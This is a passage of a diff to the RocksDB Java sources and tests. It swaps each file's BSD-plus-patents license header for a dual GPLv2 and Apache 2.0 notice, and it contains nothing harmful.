a/java/src/main/java/org/rocksdb/RocksIterator.java +++ b/java/src/main/java/org/rocksdb/RocksIterator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/RocksIteratorInterface.java b/java/src/main/java/org/rocksdb/RocksIteratorInterface.java index 3ac74a90a2c..12fdbb19731 100644 --- a/java/src/main/java/org/rocksdb/RocksIteratorInterface.java +++ b/java/src/main/java/org/rocksdb/RocksIteratorInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/RocksMemEnv.java b/java/src/main/java/org/rocksdb/RocksMemEnv.java index d7854eae178..d18d0ceb977 100644 --- a/java/src/main/java/org/rocksdb/RocksMemEnv.java +++ b/java/src/main/java/org/rocksdb/RocksMemEnv.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/RocksMutableObject.java b/java/src/main/java/org/rocksdb/RocksMutableObject.java index e167b27b1ac..e92289dc0c5 100644 --- a/java/src/main/java/org/rocksdb/RocksMutableObject.java +++ b/java/src/main/java/org/rocksdb/RocksMutableObject.java @@ -1,7 +1,7 @@ // Copyright (c) 2016, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/RocksObject.java b/java/src/main/java/org/rocksdb/RocksObject.java index 2a35852c5e2..545dd896a06 100644 --- a/java/src/main/java/org/rocksdb/RocksObject.java +++ b/java/src/main/java/org/rocksdb/RocksObject.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Slice.java b/java/src/main/java/org/rocksdb/Slice.java index a43af75ae8f..a122c3769d8 100644 --- a/java/src/main/java/org/rocksdb/Slice.java +++ b/java/src/main/java/org/rocksdb/Slice.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Snapshot.java b/java/src/main/java/org/rocksdb/Snapshot.java index 8475ec9951d..a6b53f495f2 100644 --- a/java/src/main/java/org/rocksdb/Snapshot.java +++ b/java/src/main/java/org/rocksdb/Snapshot.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/SstFileWriter.java b/java/src/main/java/org/rocksdb/SstFileWriter.java index aef8ca2dfe3..8fe576082e8 100644 --- a/java/src/main/java/org/rocksdb/SstFileWriter.java +++ b/java/src/main/java/org/rocksdb/SstFileWriter.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Statistics.java b/java/src/main/java/org/rocksdb/Statistics.java index 96e9b5d239d..10c072c897e 100644 --- a/java/src/main/java/org/rocksdb/Statistics.java +++ b/java/src/main/java/org/rocksdb/Statistics.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/StatisticsCollector.java b/java/src/main/java/org/rocksdb/StatisticsCollector.java index 8ebcb4dbc0a..48cf8af88e6 100644 --- a/java/src/main/java/org/rocksdb/StatisticsCollector.java +++ b/java/src/main/java/org/rocksdb/StatisticsCollector.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java b/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java index 18f81790e5b..f3785b15f6c 100644 --- a/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java +++ b/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/StatsCollectorInput.java b/java/src/main/java/org/rocksdb/StatsCollectorInput.java index a3acede3fc6..5bf43ade5a6 100644 --- a/java/src/main/java/org/rocksdb/StatsCollectorInput.java +++ b/java/src/main/java/org/rocksdb/StatsCollectorInput.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/StatsLevel.java b/java/src/main/java/org/rocksdb/StatsLevel.java index 023d4e1a232..cc2a87c6a21 100644 --- a/java/src/main/java/org/rocksdb/StatsLevel.java +++ b/java/src/main/java/org/rocksdb/StatsLevel.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Status.java b/java/src/main/java/org/rocksdb/Status.java index b9ec348d6e0..d34b72c6913 100644 --- a/java/src/main/java/org/rocksdb/Status.java +++ b/java/src/main/java/org/rocksdb/Status.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/StringAppendOperator.java b/java/src/main/java/org/rocksdb/StringAppendOperator.java index b392ef677d6..85c36adc7c1 100644 --- a/java/src/main/java/org/rocksdb/StringAppendOperator.java +++ b/java/src/main/java/org/rocksdb/StringAppendOperator.java @@ -1,7 +1,7 @@ // Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com). All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/TableFormatConfig.java b/java/src/main/java/org/rocksdb/TableFormatConfig.java index 29cd262c2c3..dbe524c4226 100644 --- a/java/src/main/java/org/rocksdb/TableFormatConfig.java +++ b/java/src/main/java/org/rocksdb/TableFormatConfig.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; /** diff --git a/java/src/main/java/org/rocksdb/TickerType.java b/java/src/main/java/org/rocksdb/TickerType.java index 69b50399bb0..948079c75a9 100644 --- a/java/src/main/java/org/rocksdb/TickerType.java +++ b/java/src/main/java/org/rocksdb/TickerType.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/TtlDB.java b/java/src/main/java/org/rocksdb/TtlDB.java index 72704893c29..740f51268ef 100644 --- a/java/src/main/java/org/rocksdb/TtlDB.java +++ b/java/src/main/java/org/rocksdb/TtlDB.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/WALRecoveryMode.java b/java/src/main/java/org/rocksdb/WALRecoveryMode.java index c5470da9c70..d3fc47b631f 100644 --- a/java/src/main/java/org/rocksdb/WALRecoveryMode.java +++ b/java/src/main/java/org/rocksdb/WALRecoveryMode.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/WBWIRocksIterator.java b/java/src/main/java/org/rocksdb/WBWIRocksIterator.java index 4222e1a2606..d45da2b3a1f 100644 --- a/java/src/main/java/org/rocksdb/WBWIRocksIterator.java +++ b/java/src/main/java/org/rocksdb/WBWIRocksIterator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/WriteBatch.java b/java/src/main/java/org/rocksdb/WriteBatch.java index fb447c92c6b..272e9b4cdf0 100644 --- a/java/src/main/java/org/rocksdb/WriteBatch.java +++ b/java/src/main/java/org/rocksdb/WriteBatch.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/WriteBatchInterface.java b/java/src/main/java/org/rocksdb/WriteBatchInterface.java index 4746ba3a1e4..cd024ad58d4 100644 --- a/java/src/main/java/org/rocksdb/WriteBatchInterface.java +++ b/java/src/main/java/org/rocksdb/WriteBatchInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java b/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java index 0b55543c157..fdf89b2798c 100644 --- a/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java +++ b/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/WriteOptions.java b/java/src/main/java/org/rocksdb/WriteOptions.java index 6055d1761a7..b9e8ad81c23 100644 --- a/java/src/main/java/org/rocksdb/WriteOptions.java +++ b/java/src/main/java/org/rocksdb/WriteOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/util/BytewiseComparator.java b/java/src/main/java/org/rocksdb/util/BytewiseComparator.java index 17337bfc855..18f73919da8 100644 --- a/java/src/main/java/org/rocksdb/util/BytewiseComparator.java +++ b/java/src/main/java/org/rocksdb/util/BytewiseComparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb.util; diff --git a/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java b/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java index 170f0f42e47..9417544f7a1 100644 --- a/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java +++ b/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb.util; diff --git a/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java b/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java index beedc185d4b..7fbac2fd6b9 100644 --- a/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java +++ b/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb.util; diff --git a/java/src/main/java/org/rocksdb/util/SizeUnit.java b/java/src/main/java/org/rocksdb/util/SizeUnit.java index e66fc371cd5..0f717e8d454 100644 --- a/java/src/main/java/org/rocksdb/util/SizeUnit.java +++ b/java/src/main/java/org/rocksdb/util/SizeUnit.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb.util; diff --git a/java/src/test/java/org/rocksdb/AbstractComparatorTest.java b/java/src/test/java/org/rocksdb/AbstractComparatorTest.java index db4b4d7d012..91a1e99942d 100644 --- a/java/src/test/java/org/rocksdb/AbstractComparatorTest.java +++ b/java/src/test/java/org/rocksdb/AbstractComparatorTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/BackupEngineTest.java b/java/src/test/java/org/rocksdb/BackupEngineTest.java index b50ddf49903..1caae5098ed 100644 --- a/java/src/test/java/org/rocksdb/BackupEngineTest.java +++ b/java/src/test/java/org/rocksdb/BackupEngineTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java b/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java index 597d9723ffd..c223014fd28 100644 --- a/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java +++ b/java/src/test/java/org/rocksdb/BackupableDBOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java b/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java index 94bcf7b042e..8edc8b89fd6 100644 --- a/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java +++ b/java/src/test/java/org/rocksdb/BlockBasedTableConfigTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/ClockCacheTest.java b/java/src/test/java/org/rocksdb/ClockCacheTest.java index 5fc54df60e0..d1241ac75b8 100644 --- a/java/src/test/java/org/rocksdb/ClockCacheTest.java +++ b/java/src/test/java/org/rocksdb/ClockCacheTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java b/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java index f5438b39688..75749437b81 100644 --- a/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java +++ b/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/ColumnFamilyTest.java b/java/src/test/java/org/rocksdb/ColumnFamilyTest.java index 3bf8cd22b3d..19fe332df97 100644 --- a/java/src/test/java/org/rocksdb/ColumnFamilyTest.java +++ b/java/src/test/java/org/rocksdb/ColumnFamilyTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java b/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java index 90db2727422..370a28e8196 100644 --- a/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java +++ b/java/src/test/java/org/rocksdb/CompactionOptionsFIFOTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java b/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java index 6bc6be544bf..5e2d195b6e5 100644 --- a/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java +++ b/java/src/test/java/org/rocksdb/CompactionOptionsUniversalTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/CompactionPriorityTest.java b/java/src/test/java/org/rocksdb/CompactionPriorityTest.java index a92991f39ff..b078e132f96 100644 --- a/java/src/test/java/org/rocksdb/CompactionPriorityTest.java +++ b/java/src/test/java/org/rocksdb/CompactionPriorityTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java b/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java index 41ebeb8d5d9..4c8a20950c8 100644 --- a/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java +++ b/java/src/test/java/org/rocksdb/CompactionStopStyleTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java b/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java index fcdd09acbac..a45c7173c27 100644 --- a/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java +++ b/java/src/test/java/org/rocksdb/ComparatorOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/ComparatorTest.java b/java/src/test/java/org/rocksdb/ComparatorTest.java index b3482184478..63dee7257d3 100644 --- a/java/src/test/java/org/rocksdb/ComparatorTest.java +++ b/java/src/test/java/org/rocksdb/ComparatorTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/CompressionOptionsTest.java b/java/src/test/java/org/rocksdb/CompressionOptionsTest.java index a49a70677cc..c49224ca36b 100644 --- a/java/src/test/java/org/rocksdb/CompressionOptionsTest.java +++ b/java/src/test/java/org/rocksdb/CompressionOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/CompressionTypesTest.java b/java/src/test/java/org/rocksdb/CompressionTypesTest.java index a3475b41e8e..e26cc0aca0f 100644 --- a/java/src/test/java/org/rocksdb/CompressionTypesTest.java +++ b/java/src/test/java/org/rocksdb/CompressionTypesTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/DBOptionsTest.java b/java/src/test/java/org/rocksdb/DBOptionsTest.java index ba3e9e41c97..11b7435d8a9 100644 --- a/java/src/test/java/org/rocksdb/DBOptionsTest.java +++ b/java/src/test/java/org/rocksdb/DBOptionsTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/test/java/org/rocksdb/DirectComparatorTest.java b/java/src/test/java/org/rocksdb/DirectComparatorTest.java index abdbeada9e6..9b593d05651 100644 --- a/java/src/test/java/org/rocksdb/DirectComparatorTest.java +++ b/java/src/test/java/org/rocksdb/DirectComparatorTest.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 